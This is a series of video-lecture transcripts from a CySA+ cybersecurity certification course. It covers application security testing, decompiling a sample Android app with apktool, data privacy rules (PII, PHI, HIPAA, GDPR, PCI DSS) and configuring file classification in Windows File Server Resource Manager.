This is passive and it really identifies any weaknesses that need to be addressed. Whereas penetration testing is
a little more active in that it attempts to exploit discovered weaknesses. Well, our focus here for security
testing methodologies is really on software coding and best practices.
One example is what's called white box testing otherwise called Static Application Security Testing or SAST.
With white box app testing, this means that the testing team knows about the source code. They have access to
the actual source code itself, as in prior to compilation. And so this kind of analysis can be useful to determine
if input validation is not being handled properly simply by reviewing the code without even testing it.
However, you also have Black box testing, which is also called Dynamic Application Security Testing or
DAST, D-A-S-T. Now, this gives more of an indication of what the average outside malicious user might be
able to do to an app in terms of reverse engineering it because they don't have access to the source code.
So, static app testing then is one of those things that can be built directly into your code build process because
it has access to the code before its compiled. Now that type of testing would not be applicable when you have
compiled code, which is a result of running the code through the code build process. Now the only downside to
Dynamic Application Security Testing or DAST is that it can only be applied after a solution is compiled. And
remember that security needs to be applied at every layer of the Software Development Life Cycle. So, really
the best solution is the best of both worlds both SAST and DAST testing. Now, fuzz testing is one type of test
whereby you feed unexpected data to an app to observe its results. Unit testing applies to modular chunks of
code such as microservices, which could come in the form of an application container. The beauty is you can
make a change to one segment of code one unit, even only checking out that segment of code so it doesn't
affect any other part of the code. You can make changes and test it thoroughly before making sure it's ready for
production, so it's very modular that way.
Functional testing is important to ensure that we've got functional requirements being met by a given solution.
Whereas regression testing is used to make sure that a new change, a new modification doesn't adversely affect
an unrelated part of an application.
So, fuzz testing is quite standard, it means feeding abnormal data to an app. The app doesn't expect it so maybe
that would include doing things such as passing a number to a string variable, what's going to happen? In some
cases, that could cause a malfunction of the app where the app no longer responds or even the host OS crashes
in some cases, if it's not validated properly, or reading beyond required memory to store value. This is a typical
generic overflow type of attack where memory checking isn't really being performed properly for either data
being read from memory, or data being written to memory.
So, the Heartbleed bug is an example of a buffer overflow attack at the read level, where we might supply a
web app that uses OpenSSL, that's where the Heartbleed bug stems from. And we might tell the web app that
we're requesting something from memory that's only so many characters long, in other words, if we were to
feed it the word DOG, we'd want the server to report back DOG, D-O-G. But at the same time, we might have
constructed that request, so that even though it looks like three characters, we've given the server instruction to
return the next thousand characters in memory. And so that's a buffer overflow read type of attack. So, fuzzing
can be used to ensure that an application doesn't crash when being fed abnormal data because otherwise that
would be a denial-of-service attack. Fuzzing also allows us to make sure that sensitive details aren't being
disclosed such as when unanticipated data is fed to an app and it spits back an error message.
In this video, find out how to break down larger IT solutions into smaller components for focused testing.
Objectives
[Video description begins] Topic title: Unit Testing. The presenter is Dan Lachance. [Video description ends]
There are a number of different types of testing methodologies that can be applied to software solutions. And
one of those is unit testing. Unit testing is applied to a code module. You might wonder what exactly does that
mean? Well, in a larger application, you might have a team of developers each working on a specific function
or some kind of specified functionality within an application. And so that specific functionality might be its
own unit at the software level, might be its own software component or microservice, might even run in its
own container. And so we're talking about testing just those types of things as opposed to having to test the
entire application when only a single change is required. So, application containerization has become popular
and that's why that shows up here as we're talking about unit testing. So, it's modular code.
The other thing is that we can check out that module or that microservice that chunk of code for testing
purposes. While it's checked out that code is still visible to other developers in the team, but they can't make
changes to it. It also allows for modular code scaling because it's its own piece of code. It is its own software
entity. And if we've got one aspect of an app like printing that's busier than others, then we could scale just the
printing unit or code module. So, creating unit tests, though, can be time consuming. And that's because we
might have to build a number of unit tests for different code modules or microservices. However, it's one of
those things that's worth the upfront investment in time. So, when we work with unit testing, the first order of
business is writing the original code.
Next would be testing the code, that would be a static kind of test analysis because the code's not yet been
compiled. Now after the code is compiled and further testing takes place, often functional testing of the
change, then we can then fix the code. Any code changes that are applied, then are tested again and we go
through this vicious cycle over and over again. But the benefit of continuous monitoring of code making sure
it's secure, is that you end up with a better product and also you can detect security flaws quicker. And if you
have an automated code build and testing environment, then it doesn't take very long to make code changes
and then get them deployed out to the user base.
10. Video: Android App Reverse Engineering (it_cscysa20_11_enus_10)
In this video, you will use the apktool to reverse engineer an Android app.
Objectives
[Video description begins] Topic title: Android App Reverse Engineering. The presenter is Dan
Lachance. [Video description ends]
Reverse engineering is all about stepping backwards through a specific process to determine what might have
been done at the beginning.
[Video description begins] A window called "dlachance@kali: ~" is open. The prompt
"root@kali:/decompile#" is displayed. [Video description ends]
You might use this if there are indicators of compromise in enterprise security logs and you want to trace back
to how a compromise might have began, including at the reconnaissance stage. But reverse engineering also
includes things like decompiling source code. In other words, taking a nap and decompiling it to the point
where it was source code. So, you can look at the source code. Malicious users will use this as a way to detect
any computer programming flaws in the code, and then try to take advantage of it. So, here in Linux, I've
already downloaded a sample called app1.apk.
[Video description begins] He executes the following command: ls. The output reads "app1.apk". The prompt
does not change. [Video description ends]
The apk file extension is for an Android based packaged application for Android device, such as an Android
based smartphone or tablet. So, what I'm going to do then is I'm going to decompile this application to reveal
its source code. Now, you can also do this from a legitimate aspect to harden code. Now malicious users, as we
mentioned, they will use this to try to find weaknesses that they will then try to take advantage of. So, I'm
going to go ahead then and run the Apktool built into Kali Linux. And I'll specify a space d. Now the
lowercase d here means decompile and I'll simply pass it, then name of the file and press Enter.
[Video description begins] He executes the following command: apktool d app1.apk. The output displays that
the Apktool 2.4.0-dirty is used on app1.apk. The prompt does not change. [Video description ends]
Now what should happen when this is completed is it should create a subdirectory in its current location, so
when the /decompile folder, it should create a subdirectory called app1.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. [Video description ends]
And we can then go through that subdirectory to take a peek at any resultant files, including looking at some
source code and everything related to that.
[Video description begins] He executes the following command: ls. The output reads "app1 app1.apk". The
prompt does not change. [Video description ends]
So, it's going to be a number of different files, and we're going to use the GUI in Kali Linux to look through
that.
[Video description begins] He executes the following command: cd app1. No output returns and the prompt
changes to "root@kali:/decompile/app1#". [Video description ends]
And so before too long, we'll see that the Apktool has finished, and if I were to clear the screen here in the
command line in Linux and do an ls, indeed, there is an app1 subdirectory.
[Video description begins] He executes the following command: ls. The output displays several files in the
app1 subdirectory. [Video description ends]
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So, in this course, we've examined security as it relates to software development through the entire
development life cycle, including software vulnerability testing and secure coding practices. We did this by
exploring the Software Development Life Cycle or SDLC and related methodologies. Talked about the
importance of addressing security during the entire IT life cycle. We discussed microservices, decoupling, and
the benefits of application containerization. We discussed common Platform as a Service software developers
service offerings and secure coding practices. We also talked about the benefits of software testing, including
both unit/regression testing, the use of reverse engineering by malicious users to detect programming flaws.
We also talked about how to reverse engineer an Android application using the Apktool.
In our next course, we'll move on to explore the data privacy regulations and standards designed to protect
personally identifiable information, PII, and protected health information or PHI, both on-premises and in the
cloud.
Table of Contents
Objectives
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA and Microsoft. Some of my specialties over the years have included
networking, IT security, cloud solutions, Linux management and configuration and troubleshooting across a
wide array of Microsoft products. The CS0-002 CompTIA cyber security analyst or CySA+ certification exam
is designed for IT professionals looking to gain security analyst skills. To perform data analysis, to identify
vulnerabilities, threats and risks to an organization. To configure and use threat detection tools, and secure and
protect an organization's applications and systems.
In this course we're going to explore data privacy, both on premises and in the cloud. And we'll talk about the
standards and regulations for protecting Personally Identifiable Information or PII, and Protected Health
Information, PHI. I'll start by examining various examples of PII and PHI and the role that regulatory
compliance plays in the design and development of organisational security policies. Then I'll explore how
HIPAA protects sensitive medical information. How GDPR assures data privacy, and the purpose of PCI DSS
for card holder merchants. Next, I'll demonstrate how to configure both server-based and cloud-based data
classification using Windows Server File Server Resource Manager. As well as Amazon Web Services Macie,
respectively. Lastly, I'll examine when Data Loss Prevention or DLP solutions should be used for data privacy
and protection. And also I will demonstrate how to use Microsoft Azure to configure DLP policies.
Upon completion of this video, you will be able to recognize examples of personally identifiable information.
Objectives
[Video description begins] Topic title: PII. The presenter is Dan Lachance. [Video description ends]
As a Cyber Security Analyst, you need to be aware of data privacy terminology and also data privacy
standards. Personally Identifiable Information or PII is anything that can be uniquely traced to a single person
to an individual.
[Video description begins] Personally Identifiable Information (PII). [Video description ends]
Now, it could be one or more pieces of information together that leads you back to a single person's identity.
And so as a result, there's a lot of data privacy regulations as well as standards related to the protection of PII.
This includes the collection of it, its transmission over a network, such as whether it's encrypted or not with
HTTPS or through a VPN tunnel. The storage of PII, usually this means encrypting it, protection of data at
rest. The sharing of that data with other organizations. What this brings to mind is the collection of private
information based on a user's web browsing habits being sold to marketers and whether or not that's allowed.
So the usage of that collected data.
Personally Identifiable Information comes in many forms. It might include a web browser cookie. A web
browser cookie is a small text file that is used by a web browser to store session information or preferences for
an app, that type of thing. So depending on what's stored in the web browser cookie would determine whether
or not it's considered PII. Such as unique session information for an authenticated session to a secured website.
Other examples of PII might include user location data through GPS, the Global Positioning System, in other
words, satellite longitude and latitude coordinates. The IP address is considered PII, a user's credit card
number, their mother's maiden name, their street address. The list just goes on and on and on.
Sensitive Personal Information is also called SPI. And this is a form of personal identifiable information. But,
take a look at some of these examples. An example of SPI might be political party affiliation. So it's not
necessarily specific and easily traced back to a single individual by itself. For example, there might be some
political polls for a specific political party and that doesn't necessarily trace back to an individual. But
combined with other information, perhaps it could, it's a Sensitive Personal Information. Another example of
this would be a person's sexual orientation or their membership in specific trade unions.
Upon completion of this video, you will be able to recognize examples of protected health information.
Objectives
[Video description begins] Topic title: PHI. The presenter is Dan Lachance. [Video description ends]
Protected Health Information, or PHI, it's kind of the same type of thing. It's sensitive data, but more focused
on the medical industry, primarily in the US when it comes to some regulatory standards like HIPAA. So it
could be passed as well as current health information. It also can deal with future health details. You might be
wondering how is that possible. Well, it might relate more to things like the care that will be given based on a
medical insurance plan, how payments will be made and that type of thing. Now, it's important to conduct
periodic audits to ensure that any security controls in place to protect sensitive data are effective.
[Video description begins] PII and PHI Audit Assurance Review. [Video description ends]
So it would begin with first reviewing any related organizational security policies that might currently be in
place to protect PII or PHI. Then evaluating any existing security controls and how effective they are at
protecting that data. Identifying any deficiencies, whether the entire security control is deficient or its
configuration is, and then implementing the changes. In the end, for a modern Cyber Security Analyst, the
protection of sensitive data is more important now than it ever has been in the past.
Upon completion of this video, you will be able to recognize how regulatory compliance often plays a role in
crafting organizational security policies.
Objectives
recognize how regulatory compliance often plays a role in crafting organizational security policies
[Video description begins] Topic title: Regulatory Compliance. The presenter is Dan Lachance. [Video
description ends]
A Cyber Security Analyst needs to have a much deeper knowledge than just the technical side of IT security.
Not that it's not important, it is important, but equally as important is the framework in which we place security
controls to protect assets. And so that's where regulatory compliance kicks in. IT security specialists need to be
aware of security compliance regulations for an organization.
It's going to vary from one company to the next, depending on the nature of the business. Now often,
complying with regulations and laws feeds into us crafting our organizational security policies. or changing
them over time to reflect the protection of assets in some way.
So think about the applicable regulations for your organization, whether you're a nonprofit organization or you
deal with credit card holder information, or it's a web e-commerce type of site, financial, manufacturing. Every
organization in different parts of the world is going to have to be compliant with some kind of regulation. Now
it's important that we align the controls to protect these assets at the security level with the objectives of the
business.
[Video description begins] Security and Business Objectives. [Video description ends]
We have to think about business processes that might benefit from security controls. And they might not even
be security technical based controls, might be more administrative or process-based. Such as ensuring that no
single employee controls an entire business process from beginning to end. When it involves money, such as
the payment of accounts' payable invoices. It also means determining which data assets we have that are
covered by the scope of the regulation. Such as GDPR in the European Union, and the protection of European
Union citizen sensitive data.
So regulatory compliance is going to be important also in terms of the incident response plan. So is the routine
in place that's ready where everybody knows their role their responsibilities in dealing with a specific type of a
security incident. Such as a data breach and whether we need to contact the appropriate personnel including
public relations for public disclosure, where required. So for regulatory compliance, we might have to ensure
confidentiality. And integrity of data confidentiality could be achieved using technical solutions like
encryption of data at rest. Integrity might come in the form of file hashes so that we can determine if changes
or modifications have been made. Regulatory compliance might dictate how long certain types of data are
retained.
So for example, the retention of financial data might be required for longer period than standard product and
service documentation within an organisation. So you need to know what type of data you have out there,
where it is. And it needs to be classified to facilitate things like data retention, so then you will know what is
financial data versus what is not. The next thing is, as we've mentioned, as part of the incident response plan,
there might be a requirement to disclose any security incidents. Such as those that might affect any user's
private data, whether it be financially based or not.
Upon completion of this video, you will be able to describe how HIPAA protects sensitive medical
information.
Objectives
[Video description begins] Topic title: HIPAA. The presenter is Dan Lachance. [Video description ends]
If you're an IT technician for an organization in the United States that might somehow come in contact with
health insurance or medical information, then HIPAA or the Health Insurance Portability and Accountability
Act might be applicable.
[Video description begins] Health Insurance Portability and Accountability Act (HIPAA). [Video description
ends]
First thing to consider is that we're talking here about the protection and limited disclosure of Protected Health
Information which is often referred to as PHI, sometimes ePHI for Electronic Protected Health Information. So
it applies to the United States and organizations that are affected by the HIPAA regulation. So this would
include organizations such as health care providers and health plans that might be offered through medical
insurance companies. So really, HIPAA applies to entities that deal with this kind of information and the
related business associates. HIPAA deals with certain terminology that we should be aware of including
Electronic Medical Record or EMR, as well as Electronic Health Record EHR and Personal Health Record
PHR. Well, it's fine to identify what these stands for. But what do they mean, and what's the difference
between each of the three? An Electronic Medical Record or EMR is the kind of thing that you would deal
with within a small doctor's office or larger doctor's office where they enter in specific patient medical
information. Now that would be something specific to when you go to visit the doctor for whatever the reason
it might be, that's an EMR.
Now, the Electronic Health Record can result from some of those doctor individual visits because the EHR is a
little bit more global. This is an Electronic Medical Record, a standardized record for you as an individual that
can even be accessed across different health care providers. The Personal Health Record or PHR is a little bit
different. This means that there is someone that is designated as a person that has control of the Personal
Health Record, such as it could be for a family member of someone that can't make decisions for themselves.
Now, the Personal Health Record stems from birth all the way through to death. So it's the entire medical
history over a patient's lifetime.
The Health Insurance Portability and Accountability Act or HIPAA does also specify that there should be
some physical safeguards put in place such as physical security at the facility level. And also rooms or floors
within facilities that need to be perhaps on secured floors that might require card access. Also, locked
equipment racks, especially for storage arrays that contain sensitive medical data. Technical safeguards would
include things like Network Access Control or NAC N-A-C to limit which devices can even make a
connection to the wired or wireless network in the first place. The backup and replication of sensitive medical
information, the proper configuration of firewalls with periodic review of rules to determine their efficacy or
see if there are any gaps where there needs to be new rules configured. And also the use of encryption over the
network and for data at rest.
Upon completion of this video, you will be able to describe how GDPR assures data privacy.
Objectives
[Video description begins] Topic title: GDPR. The presenter is Dan Lachance. [Video description ends]
One of the great things about the Internet from a business perspective is it really facilitates globalization.
[Video description begins] General Data Protection Regulation (GDPR). [Video description ends]
It opens up a much larger marketplace than might have been available decades ago. As a result, if you are
dealing with sensitive data from customers in specific regions. There might be regulations that you must
adhere to, such as the General Data Protection Regulation, or GDPR. This one is a legislative act of the
European Union, the EU. It's designed to essentially put the control of a user's personal data into their hands.
The user we're referring to here is an EU citizen, to be specific. So it's about data privacy of PII, Personally
Identifiable Information. In terms of its collection and retention, how that sensitive data gets used, its sharing.
Now there are some things to think about with GDPR. And we have to look at it from two perspectives. Both
the organization that's working with European Union citizen data and the European Union citizen themselves.
So the individual. Let's start with organizations. Now, the GDPR will apply certainly to organizations within
the European Union that process European Union citizen personal data. But also to organizations outside of the
EU. EU citizens have a number of rights under GDPR. One is that they will have clear communication about
their personal data being collected and they can opt into or out of that. And also clear communication about
how their collected data, should they opt in, will be used. Individuals also have the right to have a simple way
to correct inaccurate personal data. And also they would have to have access to it in the first place even just to
view it before they would even be able to correct any misinformation. GDPR implementation begins with data
inventory.
Now, what does this mean? Why is this relevant? Well, because you can't determine what is Personally
Identifiable Information for European Union citizens. Until you know what type of data is being stored in your
environment. Whether it's on-premises, in the cloud, being replicated around the cloud. Data classification is
so important. You might, for example, have an automated solution, be it on-premises or cloud-based, that looks
through, scours through all of your data. To look for indications of citizens of the EU, and if so, then GDPR
would apply. So it's a matter of also then performing a risk analysis for threats against that data. And then
applying security controls that make sense to protect the data. Whether it's Multi-Factor Authentication. When
users sign in to enhance security to protect data that might be resultant from an application that supports MFA.
Could be the encryption of that data when it's stored using data masking, such as when modifying or querying
or adding database records. So hiding sensitive information like the credit card numbers, other than perhaps the
last four digits. And then of course a periodic review of security controls and practices currently in place. To
ensure that they are still effective in protecting data properly.
In this video, you will identify the purpose of PCI DSS for cardholder merchants.
Objectives
[Video description begins] Topic title: PCI DSS. The presenter is Dan Lachance. [Video description ends]
If you've worked in IT security for a number of years you've probably heard the term PCI DSS.
[Video description begins] Payment Card Industry Data Security Standard (PCI DSS). [Video description
ends]
It stands for Payment Card Industry Data Security Standard. This is an international standard as opposed to
something like HIPPA, which is specific to medical information in the United States. Or GDPR, which is
specific to the private data of European Union citizens. This one's international. Well, how does it apply? Well
it applies to merchants that will work with credit card holder information. So its purpose is to harden payment
card-processing environments. So not necessarily just the specific system that will handle credit card
information like payment gateways, but the surrounding ecosystem.
Now, each type of credit card will have it's own specific compliance details, although there are many
similarities that overlap. So that means PCI DSS compliance will differ for Visa than it would for MasterCard
or American Express. PCI DSS requires that a certain number of steps be taken to identify and protect
cardholder information beginning with the identification of cardholder data in the first place. Now the thing to
consider from a merchant standpoint is you don't want to store credit cardholder information if you don't have
to. Why would you store something that you have to secure if you don't need to? Because it's more resource
and time allocation. If it's somebody else's problem, so to speak, and that is in line with laws, regulations or
standards. Then that would be something that should be considered. Don't store data you don't need.
So the next thing we would do after identifying cardholder data, using a data classification tool of some kind,
is to assess any existing security controls that protect that data, to make sure that they're effective. If they are
not, then we need to remediate the situation. It might mean for example, getting a new firewall appliance. If
there are known vulnerabilities with the one currently in place and there are no updates available. It might also
mean that we put in something in place such as data masking. So if employees are periodically pulling up
credit card transactions such as when customers call, they're pulling it up on screen, probably shouldn't be
displaying the entire credit card number. Instead, maybe, masking all of it out other than the last four digits.
PCI DSS also requires, periodic compliance reports.
Now if we've gotten a number of goals listed in PCI DSS, how those goals are achieved is really up to the
specific organization and the security technicians. So PCI DSS might have a lot of control objectives,
specifically what should be done, but not exactly on how it should be done. So if the goal let's say in PCI DSS
is to build and maintain a secure network, how do you do that? Well, that might be configuring firewalls
appropriately and not allowing traffic through unless it absolutely specifically needs to go through. Changing
system defaults. The goal is to protect card holder data, that's a pretty generic statement. Well, security
controls could include encrypting data over the network especially in a public network environment, and also
protecting stored data by encrypting data at rest. If the goal is to maintain a vulnerability management program
within the organization. Part of that might be continual update of antivirus solutions and applying security to
all SDLC phases, system development or software development life cycle. If the goal is to implement strong
access control.
Well, how do we implement that exactly? Well, it means only granting permissions on a need to know basis
for cardholder data if you're storing it at all. Using unique user accounts in your systems so that there is
accountability and auditing that can be enabled. And also physical security controls. So if it turns out that we
do need to store cardholder data, we don't want that in a point of sale system, let's say at a gas station, to be
something that's stored under the desk where customers can come in. We want to make sure it's physically
secured. If the goal is to regularly monitor and test networks, how do we implement a security control that
reflects that? Well, we could have continuous network host and app monitoring and periodic security tests. If
the goal states that we need to maintain an information security policy. Well, that might mean continual review
and updating of organizational security policies. So there are a lot of considerations with PCI DSS where often
the general objective of securing an asset is shown but not exactly how to do it.
8. Video: Server-based Data Classification (it_cscysa20_12_enus_08)
During this video, you will learn how to configure data classification using the Windows Server File Server
Resource Manager.
Objectives
configure data classification using Windows Server File Server Resource Manager
[Video description begins] Topic title: Server-based Data Classification. The presenter is Dan
Lachance. [Video description ends]
Data classification is crucial in, first of all, inventorying which data is actually available to an organization.
And how it's spread out across multiple branch offices, perhaps being replicated in different geographical
regions through the cloud. But either way, it's important to inventory and then classify data types. For instance,
if your company is required by regulations to retain financial information for a period of time, in a particular
manner. You've got to know which of your data sets are related to financial information. So in Windows
Server 2019, I'm going to use the File Server Resource Manager, FSRM, to classify data stored on the server.
So here in my server, I'm going to start by going to the Start menu and firing up the Server Manager. I need to
make sure that the File Server Resource Manager component is actually installed.
[Video description begins] He opens a window labeled "Server Manager". It is divided into three parts: menu
bar, navigation pane, content pane, and a pane labeled "Actions". The navigation pane contains three options
labeled "Dashboard", "Local Server", and "All Servers". The Dashboard option is selected and its
corresponding page is open in the content pane. It is divided into two sections. The first section includes a tile
labeled "QUICK START". It displays five steps to configure a local server. The first step is labeled "Configure
this local server". The second step is labeled "Add Roles and Features". [Video description ends]
So I'm going to click Add roles and features and I'm going to click Next to go through the default settings until
I reach the Roles screen.
[Video description begins] He clicks the Add Roles and Features step and its corresponding wizard opens. The
first page in the wizard is labeled "Before You Begin". He clicks a button labeled "Next". The next page
labeled "Installation Type" displays. He again clicks the Next button. The next page labeled "Server Selection"
displays. Then he clicks the Next button. The next page labeled "Server Roles" displays. It includes a list of
roles and their description. [Video description ends]
We're down to the Fs, I'm going to expand File and Storage Services and underneath that I'll expand File and
iSCSI Services. We can see the File Server component is installed, however, the File Server Resource Manager
or FSRM is not. So I'm going to click in the box to put a checkmark there, and I'll click the Add Features
button. And I'm just going to proceed through the wizard, I'm going to click Next.
[Video description begins] He selects a checkbox adjacent to an app labeled "File and Storage Services (2 of
12 installed)". Its sub options includes an app labeled "File and iSCSI Services(1 of 11 installed)". He selects
a checkbox adjacent to the File and iSCSI Services(1 of 11 installed) app and another list of apps displayed
which includes apps labeled "File Server (Installed)" and "File Server Resource Manager". He points to the
File Server (installed) app. It is selected by default. Then he selects a checkbox adjacent to the File Server
Resource Manager app. A dialog box labeled "Add Roles and Features Wizard" opens. It includes a button
labeled "Add Features". He clicks the Add Features button and the dialog box closes. [Video description ends]
And continue all the way until I get to the last screen to confirm my installation selections, and I'll click the
Install button.
[Video description begins] He clicks the Next button. The next page labeled "Features" displays. Then he
again clicks the Next button and the next page labeled "Confirmation" displays. Then he clicks a button
labeled "Install". The next page labeled "Results" displays. [Video description ends]
So now that we've got that component installed, I'm going to click Close. And I'm going to shut down the
Server Manager, we no longer need it.
[Video description begins] He closes the Server Manager window. [Video description ends]
Now what I want to do is take a look at the file system on this machine. So if I navigate to drive D on this
server. I've got a couple of folders, one's called Budgets, and I've got another one called SampleFiles where
I've got some credit card data. Now notice I've got the text Credit card numbers with some fictitious numeric
values here that represent credit card numbers.
[Video description begins] He opens a file labeled "CreditCardData" in a Notepad application. [Video
description ends]
So we're going to be classifying this type of data as PII, P-I-I. Notice that if I were to right-click on a file or
even a folder here in the file system, I'm going to right-click and if I were to go down to Properties, and if I
were to take a look at the tabs across the top, notice the presence of the Classification tab.
[Video description begins] He closes the CreditCardData file and right-clicks on it to open a dialog box
labeled "CreditCardData Properties". It contains five tabs labeled "General", "Classification", "Security",
"Details", and "Previous Versions". [Video description ends]
That is only there because we just installed the File Server Resource Manager or FSRM component.
Otherwise, you wouldn't see it. So I could manually come here, go under Classification and if I've configured
some properties, which we haven't done yet.
[Video description begins] He selects the Classification tab and its corresponding table with two columns and
no row displays. The column headers are Name and Value. [Video description ends]
I could manually classify this but you can also schedule your server to scour through the data. And look for
certain patterns and automatically classify your data. Let's explore those options. So I'm going to make sure I
go to the Start menu here, because I want to start up the File Server Resource Manager tool.
[Video description begins] He closes the CreditCardData Properties dialog box. [Video description ends]
So I'm going to go down under Windows Administrative Tools, and in the Fs there's File Server Resource
Manager. Let's fire that up. This tool can be used for a number of items, like file screening to limit which types
of files are allowed on servers and so on. But we are interested in classification management, I'm going to
expand that.
[Video description begins] A window labeled "File Server Resource Manager" opens. It is divided into three
parts: menu bar, navigation pane, and content pane. The navigation pane contains a root node labeled "File
Server Resource Manager (Local)". It includes a folder labeled "Classification Management". The root node
is selected and its corresponding folders are displayed in the content pane. [Video description ends]
I'm going to start by going to Classification Properties. Here we can see properties that can be used to assign
certain types of metadata to files in the file system, files and folders, actually.
[Video description begins] He expands the Classification Management folder which contains two files labeled
"Classification Properties" and "Classification Rules". He selects the Classification Properties file and a table
with multiple columns and three rows displays in the content pane. The column headers are Name, Scope, and
Usage. [Video description ends]
Now I can right-click on that and choose Create a Local Property. For example here, I'm going to create a
property called PII.
[Video description begins] He right-clicks on the Classification Properties file in the navigation pane and a
flyout opens which includes an option labeled "Properties". He clicks the Properties option and a dialog box
labeled "Create Local Classification Property" opens. [Video description ends]
I can put in a description but I'm not going to do that. And I could determine if it's a Yes/No type of item
which would be in this case, that would make sense. But it could also be a Date-time piece of metadata, or a
numeric or multiple choice.
[Video description begins] He types PII in a text box labeled "Name". Then he points to a text box labeled
"Description". Then he points to a table with three columns and two rows. The first column header is empty.
The second and third column headers are Value and Description respectively. The row entries under the Value
column headers are Yes and No. The Description column is empty. [Video description ends]
For example, if we want to be able to assign certain files to certain projects or departments or cost centers for
classification purposes. But in this case, Yes/No will do the trick. So I'm going to go ahead and click OK. So
now we've got our PII, Personally Identifiable Information, label.
[Video description begins] He clicks a drop-down list box labeled "Property Type". A drop-down list box
opens which includes options labeled "Yes/No", "Data Time", "Number", and "Multiple Choice List". He keeps
the Yes/No option as default. He closes the Create Local Classification Property dialog box. A new row adds
in the table displayed in the content pane. The new row entries under the Name, Scope, Usage, Type, and
Possible Values column headers are PII, Local, File Classification, Yes/No, and Yes, No respectively. [Video
description ends]
Let's go back into the file system for just a second, and if we were to right-click on a file or a folder. Go into
Properties once again and Classification, notice the presence of PII because we just added that local property.
[Video description begins] He switches to the SampleFiles folder. He right-clicks on the CreditCardData file
to open the CreditCardData Property dialog box. He clicks the Classification tab and its corresponding table
displays. The table includes a row entry. The row entries under the Name and Value column headers are PII
and (None). [Video description ends]
Now it's currently set to None, and as I've mentioned, we could manually flag items, Or classify them and say
Yes, the credit card data file is Personally Identifiable Information, let's flag it as such. However, that takes a
lot of work and we should use automation wherever possible, which is what we're going to do.
[Video description begins] He points to a radio button labeled "None". Then he selects a radio button labeled
"Yes". The value under the Value column header changes to Yes. [Video description ends]
So let's go back to the File Server Resource Manager, I'm going to go to Classification Rules.
[Video description begins] He did not save the changes and closes the CreditCardData Property dialog
box. [Video description ends]
Where I'm going to right-click on that and choose Create Classification Rule.
[Video description begins] He switches to the File Server Resource Manager window. Then he right-clicks on
the Classification Rules file in the navigation pane. A flyout opens which includes an option labeled "Create
Classification Rule". He clicks the Create Classification Rule option and a dialog box labeled "Create
Classification Rule" opens. It contains four tabs labeled "General", "Scope", "Classification", and "Evaluation
Type". The General tab is selected by default. [Video description ends]
This is going to be Seek PII and under Scope, I'm going to tell it, let's say, I'll click the Add button. I'm going
to tell I want to look on drive D on This PC. Now I could tell it to look within a folder.
[Video description begins] He types Seek PII in a text box labeled "Rule name". Then he clicks the Scope tab
and its corresponding options displayed. He clicks a button labeled "Add". A dialog box labeled "Browse For
Folder" opens. It includes a root node labeled "This PC". [Video description ends]
It doesn't have to be an entire drive or anything like that, so I'm going to go down and choose drive D. I'll click
OK, then I have to click on Classification.
[Video description begins] He expands the root node and its folders display in the hierarchy. He selects a
folder labeled "New Volume (D:)". Then he selects a button labeled "OK" and the Browse For Folder dialog
box closes. [Video description ends]
I want to look at the content within files. So that's fine, and notice what shows up here, our local property that
we created.
[Video description begins] He clicks the Classification tab and its corresponding options display. He points to
an option labeled "Content Classifier" in a drop-down list box labeled "Choose a method to assign a property
to files". Then he points to an option labeled "PII" in a drop-down list box labeled "Choose a property to
assign to files". [Video description ends]
What I want to do is assign a value of Yes to our PII property, but we haven't identified yet under which
conditions.
[Video description begins] He points to an option labeled "Yes" in a drop-down list box labeled "Specify a
value". [Video description ends]
So to do that, I'll click Configure so that we can tell it what we're looking for when we want to flag things as
PII Yes. So I'm going to basically tell it that I'm looking for a string, it's not going to be case-sensitive.
[Video description begins] A dialog box labeled "Classification Parameters" opens. It includes a table with
four columns and a row. The column headers are Expression Type, Expression, Minimum Occurrence and
Maximum Occurrence. The row entry under the Expression Type column header contains a drop-down list box
with a default option labeled "Regular expression". [Video description ends]
Notice you could also use regular expressions, in other words, very detailed syntactical pattern matching. But
I'm going simply to choose String, and we're just going to look for the word credit. That's all I'm interested in,
if it's got the word credit in it, that's enough for me. I want it to be treated as Personally Identifiable
Information, so we can go ahead and do that.
[Video description begins] He clicks the drop-down list box under the Expression Type column header. A
drop-down list of options displays. The options are labeled "String (case-sensitive)" and "String". He selects
the String option. Then he types credits and 1 under the Expression and Minimum Occurrence column headers
respectively. [Video description ends]
So I'm going to go ahead and click on OK. So we've now got that configured. We're looking for the word
credit.
[Video description begins] He clicks a button labeled "OK" and the Classification Properties dialog box
closes. Then he clicks the Configure button in the Create Classification Rule dialog box and the Classification
Properties dialog box opens. Then he points to credits under the Expression column header and closes the
Classification Properties dialog box. He clicks the Scope tab in the Create Classification Rule dialog box and
its corresponding options display. [Video description ends]
And we're looking for it on drive D and what we're going to do is classify it as PII with a value of Yes. So I'm
going to go ahead and click OK.
[Video description begins] He selects the Classifications tab. Then he points to the PII option in the Choose a
property to assign to files drop-down list box. [Video description ends]
Now you might have noticed when I right-click on Classification Rules, I can create a classification schedule.
So I can have this happen on a periodic basis automatically. But I can also, over on the right in the Actions
panel here.
[Video description begins] He closes the Create Classification Rule dialog box. Then he right-clicks on the
Classification Rules file in the navigation pane and a flyout opens which includes an option labeled
"Configure Classification Schedule". [Video description ends]
I can also Run Classification With All Rules, which I'm going to do now manually. It says Run classification
in the background, sure, OK.
[Video description begins] The Action pane is divided into two sections labeled "Classification Rules" and
"View". He clicks an option labeled "Run Classification With All Rules" in the Classification Rules section. A
dialog box labeled "Run Classification" opens. [Video description ends]
And we can see down below some status output here. So we can see that it's looking through our file system
and it looks like it's already done, excellent.
[Video description begins] The dialog box includes a radio button labeled "Run classification in the
background", which is selected by default. He selects a button labeled "OK" and the Run Classification dialog
box closes. Another pane adds in the content pane. It displays a run classification hierarchy. [Video
description ends]
Well, why don't we go take a look at the file system to see what's up. In other words, let's right-click on the file
that we looked at previously, the CreditCardData file under Properties, Classification. Notice it has
automatically flagged this as PII Yes.
[Video description begins] He switches to the SampleFiles folder. Then he right-clicks on the CreditCardData
file to open its properties dialog box. Then in the Classification Properties dialog box, he opens the
Classification tab. Then he points to the Yes radio button. [Video description ends]
So this is just but one simple example of what you might do on-premises to automate file classification.
During this video, you will learn how to configure cloud data classification using Amazon Web Services'
Macie.
Objectives
[Video description begins] Topic title: Cloud-based Data Classification. The presenter is Dan
Lachance. [Video description ends]
